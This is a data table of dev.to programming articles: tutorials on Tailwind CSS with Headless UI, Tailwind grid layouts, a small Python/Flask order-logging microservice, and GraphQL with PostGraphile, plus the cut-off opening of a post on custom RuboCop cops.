id int64 5 1.93M | title stringlengths 0 128 | description stringlengths 0 25.5k | collection_id int64 0 28.1k | published_timestamp timestamp[s] | canonical_url stringlengths 14 581 | tag_list stringlengths 0 120 | body_markdown stringlengths 0 716k | user_username stringlengths 2 30 |
|---|---|---|---|---|---|---|---|---|
1,225,931 | How to use Tailwind CSS 3 with Headless UI In React | In this section we will install tailwind v3 headless ui react. Headless UI is a set of completely... | 0 | 2022-10-21T06:16:21 | https://larainfo.com/blogs/how-to-use-tailwind-css-3-with-headless-ui-in-react | react, tailwindcss, headlessui, webdev | In this section we will install Tailwind CSS v3 with Headless UI in React. Headless UI is a set of completely unstyled, fully accessible UI components designed to integrate beautifully with Tailwind CSS. It also provides Dropdown Menu, Switch (Toggle), Dialog (Modal), Popover, Radio Group, Transition, and Tabs components, so you can easily copy and paste the code into your project.
### Tools Used
**Tailwind CSS 3.x**
**[Headless UI](https://headlessui.com/)**
**React JS**
### Install Tailwind CSS v3 In React
Create react project
```bash
npx create-react-app react-headlessui
```
Move to the project folder and run:
```bash
cd react-headlessui
npm start
```
Install Tailwind CSS v3 along with its PostCSS and Autoprefixer peer dependencies:
```bash
npm install -D tailwindcss postcss autoprefixer
```
Create the Tailwind config file:
```bash
npx tailwindcss init
```
Next, you need to configure the template paths in your Tailwind config.
_tailwind.config.js_
```js
module.exports = {
content: [
"./src/**/*.{js,jsx,ts,tsx}",
],
theme: {
extend: {},
},
plugins: [],
}
```
Add the `@tailwind` directives for each of Tailwind’s layers to your `./src/index.css` file:
_index.css_
```css
@tailwind base;
@tailwind components;
@tailwind utilities;
```
_App.js_
```jsx
function App() {
return (
<div className="container mx-auto mt-4">
<h1 className="text-xl font-bold ">
Setup Tailwind CSS 3 with{' '}
<span className="text-transparent bg-clip-text bg-gradient-to-r from-green-400 via-blue-500 to-purple-600">
Headless UI In React
</span>
</h1>
</div>
);
}
export default App;
```

### Install Headless UI
To get started, install Headless UI via npm or yarn:
```bash
# npm
npm install @headlessui/react
# Yarn
yarn add @headlessui/react
```
Now let's test the Headless UI Switch (Toggle) code.
_App.js_
```jsx
import { useState } from 'react'
import { Switch } from '@headlessui/react'
export default function App() {
const [enabled, setEnabled] = useState(false)
return (
<div className="container mx-auto mt-20">
<h1 className="text-xl font-bold ">
Tailwind Headless UI {' '}
<span className="text-transparent bg-clip-text bg-gradient-to-r from-green-400 via-blue-500 to-purple-600">
Switch (Toggle)
</span>
</h1>
<div className="ml-28">
<Switch
checked={enabled}
onChange={setEnabled}
className={`${enabled ? 'bg-teal-900' : 'bg-teal-700'}
relative inline-flex flex-shrink-0 h-[38px] w-[74px] border-2 border-transparent rounded-full cursor-pointer transition-colors ease-in-out duration-200 focus:outline-none focus-visible:ring-2 focus-visible:ring-white focus-visible:ring-opacity-75`}
>
<span className="sr-only">Use setting</span>
<span
aria-hidden="true"
className={`${enabled ? 'translate-x-9' : 'translate-x-0'}
pointer-events-none inline-block h-[34px] w-[34px] rounded-full bg-white shadow-lg transform ring-0 transition ease-in-out duration-200`}
/>
</Switch>
</div>
</div>
)
}
```

Run the project via npm or yarn:
```bash
# npm
npm start
# Yarn
yarn start
```
You can find more Tailwind-styled Headless UI components in the [docs](https://headlessui.com/).
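Beyond the Switch, the same install gives you the other components mentioned in the intro. As a quick illustration, here is a minimal dropdown sketch following the Headless UI `Menu` pattern; the class names, labels, and hrefs are illustrative choices, not taken from the original tutorial:

```jsx
import { Menu } from '@headlessui/react'

export default function Dropdown() {
  return (
    <Menu as="div" className="relative mt-4">
      <Menu.Button className="px-4 py-2 rounded bg-teal-500 text-white">
        Options
      </Menu.Button>
      {/* Menu.Items handles open/close state and keyboard navigation for us */}
      <Menu.Items className="absolute mt-2 w-40 rounded bg-white shadow-lg flex flex-col">
        <Menu.Item>
          {({ active }) => (
            <a href="/settings" className={`px-4 py-2 ${active ? 'bg-teal-100' : ''}`}>
              Settings
            </a>
          )}
        </Menu.Item>
        <Menu.Item>
          {({ active }) => (
            <a href="/sign-out" className={`px-4 py-2 ${active ? 'bg-teal-100' : ''}`}>
              Sign out
            </a>
          )}
        </Menu.Item>
      </Menu.Items>
    </Menu>
  )
}
```

The `{({ active })}` render prop lets Tailwind classes react to keyboard and mouse focus without any custom state handling.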
### Read Also
👉 [Tailwind CSS Halloween Buttons Tutorial Example](https://larainfo.com/blogs/tailwind-css-halloween-buttons-tutorial-example)
👉 [Tailwind CSS List Style Marker Example](https://larainfo.com/blogs/tailwind-css-list-style-marker-example)
👉 [Create a Google Clone UI using Tailwind CSS](https://larainfo.com/blogs/create-a-google-clone-ui-using-tailwind-css)
👉 [Tailwind CSS Use Custom Fonts Example](https://larainfo.com/blogs/tailwind-css-use-custom-fonts-example)
👉 [Tailwind CSS Line Chart Example](https://larainfo.com/blogs/tailwind-css-line-chart-example)
👉 [Tailwind CSS Gradient Button Example](https://larainfo.com/blogs/tailwind-css-gradient-button-example)
👉 [Tailwind CSS Text Gradient Example](https://larainfo.com/blogs/tailwind-css-text-gradient-example)
👉 [Tailwind CSS Simple POST CRUD UI Example](https://larainfo.com/blogs/tailwind-css-simple-post-crud-ui-example)
👉 [Tailwind CSS Thank You Page Example](https://larainfo.com/blogs/tailwind-css-thank-you-page-example)
👉 [Tailwind CSS 3 Breadcrumb Example](https://larainfo.com/blogs/tailwind-css-3-breadcrumb-example)
👉 [Tailwind CSS 3D Button Example](https://larainfo.com/blogs/tailwind-css-3d-button-example)
👉 [How to Use Custom Colors in Tailwind CSS](https://larainfo.com/blogs/how-to-use-custom-colors-in-tailwind-css)
👉 [How to Use Strike Tag (cut text) in Tailwind CSS](https://larainfo.com/blogs/how-to-use-strike-tag-cut-text-in-tailwind-css)
👉 [Tailwind CSS Headings Typography Examples](https://larainfo.com/blogs/tailwind-css-headings-typography-examples)
👉 [Tailwind CSS Product List Example](https://larainfo.com/blogs/tailwind-css-product-list-example)
👉 [How to Center a Div in Tailwind CSS](https://larainfo.com/blogs/how-to-center-a-div-in-tailwind-css)
| saim_ansari |
1,225,937 | Microservices | Microservice software architecture is something opposite of monolithic architecture. For small... | 0 | 2022-10-21T06:30:04 | https://dev.to/jungle_sven/microservices-42o | microservices, python, programming, api | Microservice software architecture is something opposite of monolithic architecture. For small projects, monolithic architecture is the most straightforward way to think about its design in general. But any mature project cannot be developed and supported easily if it is a monolith.
The microservice pattern forces developers to divide the project not just into separate modules and classes but into individual tiny apps called microservices. They can be deployed in different data centers, supported by other teams, etc.

Now we will build a simple microservice for our trading software. It will receive our order data via API and save it to the local database. Of course, it is possible to save that data to a local disk. Still, suppose we want to build high-frequency trading software. In that case, we don't want to waste any local resources on logging or statistics, or maybe we want to outsource the development of a feature to a different development team.
First of all, we will build a basic database connector. We will use the SQLite database for educational purposes. We will create a table of Orders containing six fields: timestamp, username, market, side, size, and price.
Example code:
```python
import sqlite3

class Database:
    #this is a DB connector
    #we will use SQLite in this example for simplicity
    def __init__(self):
        #filename and path to the database are hardcoded for simplicity
        self.connect_to = 'test.db'

    def create_table_orders(self):
        #a func to create our database
        conn = sqlite3.connect(self.connect_to)
        conn.execute('''CREATE TABLE if not exists Orders
            (timestamp TEXT NOT NULL,
            username TEXT NOT NULL,
            market TEXT NOT NULL,
            side TEXT NOT NULL,
            size FLOAT NOT NULL,
            price FLOAT NOT NULL
            );''')
        conn.close()
```
Database connector will have only one method implemented to save order data to the database.
Example code:
```python
    def add_data_orders(self, timestamp, username, market, side, size, price):
        #a func to save orders data
        conn = sqlite3.connect(self.connect_to)
        conn.execute(
            "INSERT INTO Orders (timestamp, username, market, side, size, price) VALUES (?, ?, ?, ?, ?, ?)",
            (timestamp, username, market, side, size, price))
        conn.commit()
        conn.close()
```
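A quick smoke test of the connector can be run with nothing but the standard library. This is a condensed version of the class above, with the database path parameterized so the example doesn't touch `test.db` (the parameter is my addition, not part of the original code):

```python
import os
import sqlite3
import tempfile

class Database:
    """Condensed version of the connector above, path parameterized for testing."""
    def __init__(self, connect_to="test.db"):
        self.connect_to = connect_to

    def create_table_orders(self):
        conn = sqlite3.connect(self.connect_to)
        conn.execute('''CREATE TABLE if not exists Orders
            (timestamp TEXT NOT NULL, username TEXT NOT NULL,
             market TEXT NOT NULL, side TEXT NOT NULL,
             size FLOAT NOT NULL, price FLOAT NOT NULL);''')
        conn.close()

    def add_data_orders(self, timestamp, username, market, side, size, price):
        conn = sqlite3.connect(self.connect_to)
        # Parameterized placeholders keep us safe from SQL injection
        conn.execute(
            "INSERT INTO Orders (timestamp, username, market, side, size, price) VALUES (?, ?, ?, ?, ?, ?)",
            (timestamp, username, market, side, size, price))
        conn.commit()
        conn.close()

path = os.path.join(tempfile.mkdtemp(), "orders.db")
db = Database(connect_to=path)
db.create_table_orders()
db.add_data_orders("2022-10-21T06:30:04", "jungle_sven", "BTC-USD", "buy", 0.5, 19000.0)

conn = sqlite3.connect(path)
rows = conn.execute("SELECT username, side, size FROM Orders").fetchall()
conn.close()
print(rows)  # → [('jungle_sven', 'buy', 0.5)]
```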
Second, we need an API server. Creating a simple API server with the Flask module in less than 30 lines of code is possible. It will be able to receive HTTP POST requests with order data and save it to the database.
Example code:
```python
from flask import Flask, request

app = Flask(__name__)
DB = Database()  # the connector defined above

@app.post("/API/orders")
def save_orders():
    if request.is_json:
        response = request.get_json()
        DB.add_data_orders(response['timestamp'], response['username'], response['market'],
                           response['side'], response['size'], response['price'])
        return response, 201
    return {"error": "Request must be JSON"}, 415
```
You can find complete database connector code and API SERVER code on GitHub.
And finally, we need an API connector for our service. Our API connector will use the requests library to make POST HTTP requests to our API server.
Example code:
```python
import requests

# Method of the API client class; self.api_url holds the server address.
def generate_request(self, order):
    try:
        response = requests.post(self.api_url, json=order)
        print(response)
    except Exception as e:
        print('generate_request - Exception', e)
```
You can find the complete API CLIENT code on GitHub.
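If you'd rather avoid the third-party `requests` dependency, a standard-library equivalent might look like the following. The function signature and the return-`None`-on-failure convention are my own choices, not from the repo:

```python
import json
import urllib.request

def generate_request(api_url, order, timeout=5):
    """POST an order as JSON; return the HTTP status code, or None on failure."""
    data = json.dumps(order).encode()
    req = urllib.request.Request(
        api_url, data=data, headers={"Content-Type": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except Exception as e:
        print('generate_request - Exception', e)
        return None

# An unreachable URL exercises the error branch without a running server:
print(generate_request("http://127.0.0.1:1/API/orders", {"side": "buy"}))  # → None (after printing the exception)
```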

In ~100 lines of code, we created a database connector, API server, and API client to save order data to the database on the remote server.
The code is available in this [Github repo](https://github.com/Jungle-Sven/efficient_trading_software/blob/main/3_microservices_server.py). | jungle_sven |
1,226,180 | Tailwind CSS Grid System | Author: Abdullah Numan Introduction In this article we look at how to implement... | 0 | 2022-10-21T13:46:38 | https://refine.dev/blog/tailwind-grid/ | tailwindcss, react, webdev, css | **Author: <a target="_blank" href="https://refine.dev/blog/author/abdullah_numan/">Abdullah Numan</a>**
## Introduction
In this article we look at how to implement responsive layouts with CSS Grid using **TailwindCSS Grid** classes.
TailwindCSS, or just Tailwind, is a CSS framework used for rapidly building websites. It comes with a core set of already defined CSS utility classes that can be composed and easily custom configured afterwards to implement any design with respect to responsiveness, layout and themes.
It is possible to build multi column layouts using Tailwind with its Flexbox classes by dividing the width of the container with `w-{fraction}` classes. However, with versions 1.2 and above, we can build highly elaborate layouts with Tailwind's CSS Grid classes.
Steps we'll cover:
- [What is Tailwind Grid System](#what-is-tailwind-grid-system)
- [Basic Tailwind Grid Example](#basic-tailwind-grid-example)
- [Add Grid Formatting Context](#add-grid-formatting-context)
- [Column Numbers](#column-numbers)
- [Grid Gap](#grid-gap)
- [Responsive Column Numbers](#responsive-column-numbers)
- [Size and Placement](#size-and-placement)
- [Setting Size with Span](#setting-size-with-span)
- [Placement](#placement)
- [Grid Rows](#grid-rows)
- [Span Rows](#span-rows)
- [Reorder Regions](#reorder-regions)
- [Customizing TailwindCSS Theme](#customizing-tailwindcss-theme)
## What is Tailwind Grid System
Unlike Twitter's Bootstrap and Foundation, which still use flexbox to implement their 12-column layouts under the hood, Tailwind uses CSS Grid to allow us to build responsive and highly customizable layouts with any number of columns and rows. It ships with CSS classes that implement a CSS Grid container with names like `grid`, `grid-cols-{n}` and `grid-rows-{n}`, etc. It also comes with Grid child classes that help us define the grid behavior of child elements of the grid with classes like `col-span-{n}`, `row-span-{n}`, and so on.
Tailwind's default configuration allows a maximum of 12 columns on a screen. It can be customized from the `tailwind.config.js` file. Many other options related to Tailwind's CSS Grid classes can be altered according to our taste and needs. In this post, we are going to explore extending the number of columns to 16.
In this post, mostly, we will be playing with responsive application of **Tailwind Grid** classes that allow us to change layouts after a certain breakpoint, such as using `grid-cols-3 md:grid-cols-5`.
I recommend following the documentation for Grid classes starting from [this section](https://tailwindcss.com/docs/grid-template-columns) of the TailwindCSS reference and the sections that follow.
## Project Goals
We'll implement a simple layout having a navbar, a side content area, a main content area and a footer. It will consist of three columns and five rows.
We'll start from scratch with a set of `div`s that follow the Block Formatting Context or **BFC**, and then gradually cover the concepts related to **Grid Formatting Context** by introducing new classes according to our needs.
## Project Setup
Before we begin though, in order to get things ready, follow these steps:
1. Navigate to a folder of your choice and clone [this repo](https://github.com/anewman15/tailwindcss-grid)
2. Open the cloned repository in your editor. It is important that you have the Live Server extension added and enabled.
3. Compile the styles by running ```npx tailwindcss -i ./src/styles.css -o ./dist/styles.css --watch```
4. Start Live Server and navigate to the port number, or just click on the `Go Live` button at the bottom-right corner of your code editor.
## Basic Tailwind Grid Example
First, we have the following `index.html` document that is linked to the TailwindCSS styles in the `<head>`:
```html
<!-- index.html -->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="/dist/styles.css" rel="stylesheet">
<title>Document</title>
</head>
<body>
<div class="container m-auto">
<div class="tile bg-teal-500">
<h1 class="tile-marker">ONE</h1>
</div>
<div class="tile bg-amber-500">
<h1 class="tile-marker">TWO</h1>
</div>
<div class="tile bg-yellow-500">
<h1 class="tile-marker">THREE</h1>
</div>
<div class="tile bg-lime-600">
<h1 class="tile-marker">FOUR</h1>
</div>
<div class="tile bg-green-600">
<h1 class="tile-marker">FIVE</h1>
</div>
<div class="tile bg-emerald-500">
<h1 class="tile-marker">SIX</h1>
</div>
<div class="tile bg-teal-500">
<h1 class="tile-marker">SEVEN</h1>
</div>
<div class="tile bg-purple-500">
<h1 class="tile-marker">EIGHT</h1>
</div>
<div class="tile bg-pink-500">
<h1 class="tile-marker">NINE</h1>
</div>
</div>
</body>
</html>
```
## Add Grid Formatting Context
If we introduce `grid` class to the container `div`, nothing happens:
```html
<div class="container m-auto grid">
```
That's because the default `grid` has only one column.
### Column Numbers
Let's add three explicit columns:
```html
<div class="container m-auto grid grid-cols-3">
```
Now, we have all the `div`s flowed into 3 columns according to Grid Formatting Context:

Notice that `grid-cols-3` just divides the screen into 3 equal parts of each `1fr` as with: `grid-template-columns: repeat(3, minmax(0, 1fr));`.
### Grid Gap
Let's add some gap with `gap-{size}` class. We have to set it to the grid container:
```html
<div class="container m-auto grid grid-cols-3 gap-4">
```
Now we have a gap between the children `div`s:

### Responsive Column Numbers
We can add columns at larger breakpoints:
```html
<div class="container m-auto grid grid-cols-3 md:grid-cols-5 lg:grid-cols-8 gap-4">
```
Here, we're using Tailwind's default breakpoints at `md: 768px` and `lg: 1024px`. We can see the number of columns increasing at `768px` and `1024px`:

It's important to notice that Tailwind's responsive prefixes such as `md` and `lg` do not represent screen sizes, but rather mobile-first breakpoints. So `grid-cols-3` lays out 3 columns for all screen sizes, but since the column number changes at `md`, we get 5 columns **after** that breakpoint. And because it changes again at `lg`, we get 8. It doesn't change afterwards, so we continue getting 8 columns even at the `xl` and `2xl` screen sizes.
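For reference, these responsive utilities compile to plain min-width media queries. With Tailwind's default breakpoints, the generated CSS is roughly the following (exact output depends on your configuration):

```css
.grid-cols-3 { grid-template-columns: repeat(3, minmax(0, 1fr)); }

@media (min-width: 768px) {
  .md\:grid-cols-5 { grid-template-columns: repeat(5, minmax(0, 1fr)); }
}

@media (min-width: 1024px) {
  .lg\:grid-cols-8 { grid-template-columns: repeat(8, minmax(0, 1fr)); }
}
```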
## Size and Placement
**Tailwind's CSS Grid** sizing and placement classes give us more control over how many columns a section should span and where we want it to start and end.
### Setting Size with Span
Below, we place the first `div` as a navbar. We are doing this with `col-span-{n}` for each screen size. We have to make sure it starts at the beginning of the grid and spans the entire screen at each screen size:
```html
<div class="tile bg-teal-500 col-span-3 md:col-span-5 lg:col-span-8">
<h1 class="tile-marker">ONE</h1>
</div>
```

We can refactor the above `div` as:
```html
<div class="tile bg-teal-500 col-span-full">
<h1 class="tile-marker">ONE</h1>
</div>
```
We can also use `col-start-{n}` and `col-end-{n}` to achieve this:
```html
<div class="tile bg-teal-500 col-start-1 col-end-4 md:col-start-1 md:col-end-6 lg:col-start-1 lg:col-end-9">
<h1 class="tile-marker">ONE</h1>
</div>
```
But look at the duplicated responsive classes at each breakpoint for both the start and end classes:
```html
md:col-start-1 md:col-end-6 lg:col-start-1 lg:col-end-9
```
They are not very DRY. `col-span-{n}` classes are better for setting the size.
Let's set some more sizes, namely the widths of the second and third `div`s:
```html
<div class="tile bg-amber-500 col-span-1 md:col-span-2 lg:col-span-3">
<h1 class="tile-marker">TWO</h1>
</div>
<div class="tile bg-yellow-500 col-span-2 md:col-span-3 lg:col-span-5">
<h1 class="tile-marker">THREE</h1>
</div>
```
### Placement
`col-span-{n}` classes provide limited freedom to place `div`s inside the grid container, whereas `col-start-{n}` and `col-end-{n}` lead to a lot of repetition when responsive classes are used.
We can combine start classes with span classes to write more succinct code. Start classes can be used to **place** a `div`, and span classes can be used to define its width and height.
Let's see an instance of it with the fourth `div`:
```html
<div class="tile bg-lime-600 lg:col-start-4 lg:col-span-2">
<h1 class="tile-marker">FOUR</h1>
</div>
```

As we can see, at `lg` and onward the fourth `div` starts at column four and spans two columns to the right.
OK.
Now if we look closely at the layout, we see that everything is haphazard and it is still not a well-set, usable grid to work with, as the last two `div`s seem to be isolated from the rest. This is because we have applied only half of the equation: the Grid **column** classes. The other half involves the Grid **rows**.
---
## Is your CRUD app overloaded with technical debt?
Meet the headless, React-based solution to build sleek **CRUD** applications. With refine, you can be confident that your codebase will always stay clean and boilerplate-free.
Try [refine](https://github.com/pankod/refine) to rapidly build your next **CRUD** project, whether it's an admin panel, dashboard, internal tool or storefront.
<div>
<a href="https://github.com/pankod/refine">
<img src="https://refine.dev/img/generic_banner.png" alt="refine blog logo" />
</a>
</div>
<br/>
## Grid Rows
If we want to have finer control over the grid, we need to explicitly set the number of rows, just like we did with the columns. We'll do this by introducing `grid-rows-{n}`.
For our grid, we want 5 rows. The number of rows has been defined implicitly so far, but this time we want to define it explicitly. So, we add `grid-rows-5` to our container:
```html
<div class="container m-auto grid grid-cols-3 grid-rows-5 md:grid-cols-5 lg:grid-cols-8 gap-4">
```
Now, we can go ahead and set the last `div` to become a footer. This footer will be placed in the bottom row: on the left side on smaller screens, but spanning the entire bottom row after `md`:
```html
<div class="tile bg-pink-500 row-start-5 md:col-span-full">
<h1 class="tile-marker">NINE</h1>
</div>
```
Here, `row-start-5` tells the footer to be placed in the bottom row. It looks like this:

### Span Rows
We can go further and make it more structured. Let's make the second `div` span the left side of the grid - between the navbar and the footer. We can do this by choosing the second row as the starting point of the `div` and ending at 5:
```html
<div class="tile bg-amber-500 row-start-2 row-end-5 col-span-1 md:col-span-2 lg:col-span-3">
<h1 class="tile-marker">TWO</h1>
</div>
```
We have it shaping into a better website layout:

## Reorder Regions
We can change the order of a region by altering the value of `n` in `row-start-{n}` and `col-start-{n}`. The third `div` could be an ad section which we want to display at the bottom on smaller screens and at the top on larger screens. Let's set its order at smaller screens first and then change it at `md`:
```html
<div class="tile bg-yellow-500 row-start-4 row-end-5 md:row-start-2 md:row-end-3 col-span-2 md:col-span-3 lg:col-span-5">
<h1 class="tile-marker">THREE</h1>
</div>
```
We have something looking like this:

And the final `index.html` looks like this:
```html
<!-- index.html -->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="/dist/styles.css" rel="stylesheet">
<title>Document</title>
</head>
<body>
<div class="container m-auto grid grid-cols-3 grid-rows-5 md:grid-cols-5 lg:grid-cols-8 gap-4">
<div class="tile bg-teal-500 col-span-full">
<h1 class="tile-marker">ONE</h1>
</div>
<div class="tile bg-amber-500 row-start-2 row-end-5 col-span-1 md:col-span-2 lg:col-span-3">
<h1 class="tile-marker">TWO</h1>
</div>
<div class="tile bg-yellow-500 row-start-4 row-end-5 md:row-start-2 md:row-end-3 col-span-2 md:col-span-3 lg:col-span-5">
<h1 class="tile-marker">THREE</h1>
</div>
<div class="tile bg-lime-600 lg:col-start-4 lg:col-span-2">
<h1 class="tile-marker">FOUR</h1>
</div>
<div class="tile bg-green-600">
<h1 class="tile-marker">FIVE</h1>
</div>
<div class="tile bg-emerald-500">
<h1 class="tile-marker">SIX</h1>
</div>
<div class="tile bg-teal-500">
<h1 class="tile-marker">SEVEN</h1>
</div>
<div class="tile bg-purple-500">
<h1 class="tile-marker">EIGHT</h1>
</div>
<div class="tile bg-pink-500 row-start-5 md:col-span-full">
<h1 class="tile-marker">NINE</h1>
</div>
</div>
</body>
</html>
```
<br/>
<div>
<a href="https://discord.gg/refine">
<img src="https://refine.dev/img/discord_big_blue.png" alt="discord banner" />
</a>
</div>
## Customizing TailwindCSS Theme
As mentioned above, **TailwindCSS Grid** configuration can be changed according to our needs.
Let's say for some reason we want to set the maximum number of Tailwind's grid columns to 16. This means we will need to be able to generate all the `grid-cols-{n}` classes for `n` from 1 to 16. It also means we will need to generate all the corresponding `col-start-{n}` and `col-end-{n}` classes.
We can generate these classes by extending the related properties in the `tailwind.config.js` file. For our purposes, the `gridTemplateColumns`, `gridColumnStart` and `gridColumnEnd` properties:
```ts
// tailwind.config.js
module.exports = {
theme: {
extend: {
gridTemplateColumns: {
// Simple 16 column grid
'16': 'repeat(16, minmax(0, 1fr))',
},
gridColumnStart: {
'13': '13',
'14': '14',
'15': '15',
'16': '16',
'17': '17',
},
gridColumnEnd: {
'13': '13',
'14': '14',
'15': '15',
'16': '16',
'17': '17',
}
}
}
}
```
This will make all the relevant grid classes available for us to use.
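Once the extended config above is compiled, the new utilities work like any built-in class. A hypothetical 16-column layout (this markup is illustrative, not part of the original demo) could look like:

```html
<div class="grid grid-cols-16 gap-4">
  <div class="col-span-full">Navbar</div>
  <div class="col-start-1 col-end-5">Sidebar</div>
  <div class="col-start-5 col-end-17">Main content</div>
</div>
```

Note that `col-end-17` is valid here because a 16-column grid has 17 grid lines, which is why the config extends `gridColumnEnd` up to `'17'`.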
## Conclusion
In this article, we built a simple responsive layout using **Tailwind's CSS Grid** classes. These classes allow us to set the number of columns and rows explicitly, and help us make the layout responsive by allowing us to reset them at larger breakpoints.
We can also easily alter the size and placement of a given section with **Tailwind Grid**. Reordering sections at different breakpoints is also commonly done. And perhaps most conveniently, Tailwind allows us to customize many of the properties for generating the classes we need so that we can build fluid and responsive layouts according to our individual needs. | necatiozmen |
1,226,379 | GraphQL API Integration for Full-Stack Apps with PostGraphile | In part two of this tutorial series, we’re going to look at the key features of GraphQL and how to... | 0 | 2022-10-24T14:20:01 | https://dev.to/adambiggs/graphql-api-integration-for-full-stack-apps-with-postgraphile-5701 | graphql, api, backend, postgraphile | In part two of this tutorial series, we’re going to look at the key features of GraphQL and how to integrate it with PostGraphile to enhance the back-end of our full-stack application.
In part one, we covered how to approach building a GraphQL API with TypeScript and Node.js as well as the key benefits of this architecture. If you missed it, check out how we set up the project and bootstrapped our code by installing dependencies and configuring our data model.
## What is GraphQL?
In a nutshell, GraphQL acts as a layer to fetch and mutate data. It’s language-agnostic on both the front and back-end (e.g. JavaScript, Java, C#, Go, PHP, etc.) and serves as a bridge between client and server communications.

The goal of GraphQL is to provide methods for retrieving and modifying data. To support this, GraphQL defines several core concepts:
- **Queries**: for performing data fetching operations on the server.
- **Mutations**: analogue to the standard CRUD (Create, Retrieve, Update, Delete) operations, except for the Retrieve (for which Queries are responsible in GraphQL).
- **Subscriptions**: conceptually, subscriptions are like Queries in that they are used to fetch data. A subscription can maintain an active connection to your GraphQL server, enabling the server to push live updates to subscribed clients.
- **Resolvers**: Resolvers are implemented in the back-end as handlers for the lookup logic for the requested resources.
It’s important to mention that GraphQL isn’t a framework/library, nor a database implementation or query language for the DB. Rather, it’s a specification powered by a robust type system called the Schema Definition Language (GraphQL SDL), described in its specs. It serves as a mechanism to enforce a well-defined schema that acts like a contract, establishing what is and what isn’t allowed.
It’s a wrong assumption to think that GraphQL is a database implementation or a query language tied to any particular database. Although it commonly translates to DB interactions, it’s possible to use GraphQL without having any sort of DB (e.g., you can set up a GraphQL layer to expose and orchestrate different REST API endpoints).
## Using PostGraphile to Integrate with GraphQL
There are a few ways to set up a GraphQL API in Node.js. These options may include:
- Apollo Server
- Hasura
- Prisma
- PostGraphile
Alternatively, you can build your own server with custom resolvers and a schema definition. While there are pros and cons for each method, we’ll use PostGraphile in this tutorial. We’ve made that choice because it provides an instant GraphQL API based on the DB schema.
## What Is PostGraphile?
PostGraphile is a powerful tool that makes it easy to set up a robust GraphQL API relatively quickly. According to the official documentation:
_“PostGraphile automatically detects tables, columns, indexes, relationships, views, types, functions, comments, and more — providing a GraphQL server that is highly intelligent about your data, and that automatically updates itself without restarting when you modify your database.”_
This makes PostGraphile a great option for developers because it enables them to build fast, reliable APIs. Some of the key features that make this possible are:
- Strong PostgreSQL support
- Use of GraphQL best practices
- Simplicity to deploy and scale
- Customizability
- Impressively high performance
- Granular authorisation via RLS
- Open source under MIT license
- Powerful plugin system
## Configuring PostGraphile
There are two ways of integrating PostGraphile into our project: via **PostGraphile CLI** or through a middleware. For this project, we’ll use a middleware.
Now that we have an overview of GraphQL and how **PostGraphile** can be helpful in our demo project, let’s go ahead and install the **PostGraphile** dependency in our project.
```bash
npm install postgraphile@^4.12.9
```
To use PostGraphile in our application, we need to import it like our other dependencies. The import can be added to the top of the App.ts file:
```ts
import postgraphile from 'postgraphile'
```
After that, all we need to do to complete the setup is to enhance our App.ts and bootstrap our Express server with PostGraphile Middleware. To do that, replace this code section:
```ts
/**
 * This is our main entry point of our Express server.
 * All the routes in our API are going to be here.
 **/
const App = () => {
  const app = express()
  app.use(express.json())
```
With this:
```ts
const pgUser = '*** INSERT YOUR POSTGRESQL USER HERE ***'

/**
 * This is our main entry point of our Express server.
 * All the routes in our API are going to be here.
 **/
const App = () => {
  const app = express()
  app.use(express.json())
  app.use(postgraphile(`postgresql://${pgUser}@localhost/catalog_db`, 'public', {
    watchPg: true,
    graphiql: true,
    enhanceGraphiql: true,
  }))
```
We’re basically configuring the **PostGraphile** middleware in our server.
Now, if you restart the server and hit the http://localhost:8090/graphiql in your browser, you’re going to see some really interesting stuff! We’ll dig into all of that in the next section.
Note: if, when restarting the server, you see:
- _“Failed to setup watch fixtures in Postgres database”_
- _“A serious error occurred when building the initial schema. Exiting because `retryOnInitFail` is not set”_
_Then make sure the user specified in the **const pgUser =** is valid and that you have the admin privileges for changing the Postgres DB Schema._
## GraphQL Playground
GraphQL Playground is a sort of IDE for exploring and interacting with a GraphQL server. It comes with an interactive UI that runs in the browser, where you can build and test queries/mutations and explore GraphQL schemas.
What you are seeing is an enhanced version of GraphiQL shipped with PostGraphile. While it’s out of the scope of this tutorial to dive deep into the GraphQL playground, we’ll cover some of the key features that it provides.
## GraphQL API Documentation
Our GraphQL Playground can also serve as an API documentation with the powerful schema introspection feature. Let’s take a look.
First, in the top-right corner, click on the **“< Docs”** option. This will open the **Documentation Explorer**:

There are two root types enabled: **Query** and **Mutation**. Let’s explore the **Query** type.
If you scroll down, you’ll see many options available to use. In TypeORM, we defined the entities to be added to the PostgreSQL server. The PostGraphile middleware is able to automatically expose these entities to GraphQL, allowing us to access them through GraphiQL.
Let’s take a look at the **allCategories** query as an example:

By clicking on the **allCategories** hyperlink, you can see the details of that query:

This window displays the different methods you can use to work with the query results.
Notice that GraphQL supports cursor-based (after, before) and offset-based (first/last, offset) pagination, as well as ordering and filters (condition), all out of the box!
As for the **Mutation** type, you have access to create, update and delete utilities for all of our entities!
In the following sections, we’ll explore some of the fundamental features of a GraphQL API: writing Queries and Mutations.
_Note: this article is not going to cover all the details of writing **Queries** and **Mutations**. If you’re interested in this, there are some great resources on the official GraphQL Foundation website._
Want to learn more? I would highly recommend this article: [GraphQL API Integration for Full-Stack Apps with PostGraphile [Tutorial Part 2]](https://www.scalablepath.com/full-stack/graphql-and-postgraphile-integration-full-stack-tutorial-part-2) | adambiggs |
1,226,403 | Writing and testing a custom RuboCop cop | Solving a problem is great — but keeping it from coming back is even better. As we resolve issues in... | 0 | 2022-10-21T17:36:44 | https://dev.to/aha/writing-and-testing-a-custom-rubocop-cop-32bc | rails, ruby, rubocop | Solving a problem is great — but keeping it from coming back is even better. As we resolve issues in our code base, we often consider how to keep that classification of issue out of the code base entirely. Sometimes we reach for [RuboCop](https://docs.rubocop.org/rubocop/index.html) to help us police certain patterns. This also helps to document the originating issue and educates teammates on why these patterns are undesirable.
RuboCop is more than just a linter. It is highly extensible and allows you to write [custom cops](https://thoughtbot.com/blog/rubocop-custom-cops-for-custom-needs) to enforce specific behavior. These cops can be used to create better code practices, prevent bad patterns from sneaking into a legacy code base, and provide training for other engineers. But it can be tricky to know [how to create a new cop](https://docs.rubocop.org/rubocop/development.html) and if it will work long-term.
> We can write unit tests to ensure the success of our custom cops, just as we would with any application code.
